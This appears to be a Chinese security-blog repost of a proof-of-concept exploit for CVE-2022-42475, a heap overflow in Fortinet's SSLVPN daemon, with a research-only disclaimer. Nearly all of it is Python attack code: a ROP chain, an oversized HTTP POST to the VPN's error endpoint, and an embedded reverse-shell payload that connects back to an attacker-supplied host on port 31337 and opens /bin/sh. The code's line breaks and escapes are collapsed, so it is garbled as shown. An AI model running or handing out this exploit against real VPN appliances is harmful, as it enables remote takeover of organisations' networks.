Cve-2022-42475 飞塔

admin 2024年11月24日12:20:47评论10 views字数 2147阅读7分9秒阅读模式

https://github.com/scrt/cve-2022-42475

利用 Fortinet 的 SSLVPN 守护进程中的堆溢出的 POC 代码

Cve-2022-42475 飞塔

import socketimport sslfrom pwn import *import timeimport sysimport requestscontext = ssl.SSLContext()target_host = sys.argv[1]target_port = sys.argv[2]reverse = sys.argv[3]params = sys.argv[4].split(" ")strparams = "["for param in params:    strparams += "'"+param+"',"strparams = strparams[:-1]strparams += "]"#binary functionsexecve = p64(0x0042e050)#binary gadgetsmovrdirax = p64(0x00000000019d2196)# : mov rdi, rax ; call r13poprsi = p64(0x000000000042f0f8)# : pop rsi ; ret)poprdx = p64(0x000000000042f4a5)# : pop rdx ; ret)jmprax = p64(0x0000000000433181)#: jmp rax)pops = p64(0x000000000165cfd7)# : pop rdx ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret)poprax = p64(0x00000000004359af)# : pop rax ; ret)gadget1 = p64(0x0000000001697e0d); #0x0000000001697e0d : push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; retpoprdi = p64(0x000000000042ed7e)# : pop rdi ; retrax3 = gadget1#hardcoded value which would probably need to be bruteforced or leakedhardcoded = 0x00007fc5f128e000scbase = p64(hardcoded)rdi = p64(hardcoded + 0xc48)cmd = p64(hardcoded + 0xd38)asdf = hardcoded + 0xd38cmd1 = p64(asdf)cmd2 = p64(asdf+16)arg1 = p64(asdf+48)arg2 = p64(asdf+56)arg3 = p64(asdf+64)ropchain = popraxropchain += execveropchain += poprdiropchain += cmd1ropchain += poprsiropchain += cmd2ropchain += poprdxropchain += p64(0)ropchain += jmpraxropchain += b"/bin/pythonx00x00x00x00x00"ropchain += arg1ropchain += arg2ropchain += arg3ropchain += p64(0)ropchain += b"pythonx00x00"ropchain += b"-cx00x00x00x00x00x00"ropchain += b"""import socket,sys,osns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)ns.connect(('"""+ reverse.encode() + b"""',31337))n[os.dup2(s.fileno(),x) for x in range(3)]ni=os.fork()nif i==0:n os.execve('/bin/sh', """+strparams.encode()+b""",{})nx00x00"""try:    with socket.create_connection((target_host, int(target_port,10))) as sock:        with context.wrap_socket(sock, server_hostname=target_host) as ssock:            ssock.settimeout(2)            context.verify_mode = ssl.CERT_NONE            payload = b"A"*173096+rdi+poprdi+cmd+pops+b"A"*40+pops+rax3+b"C"*32+ropchain            tosend = b"POST /remote/error HTTP/1.1rnHost: "+target_host +b"rnContent-Length: 115964117980rnrn" + payload            ssock.sendall(tosend)            r = ssock.recv(10024)except Exception as e:    print("Exception occurred :"+ repr(e))

原文始发于微信公众号(Khan安全攻防实验室):Cve-2022-42475 飞塔

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月24日12:20:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Cve-2022-42475 飞塔https://cn-sec.com/archives/1618361.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息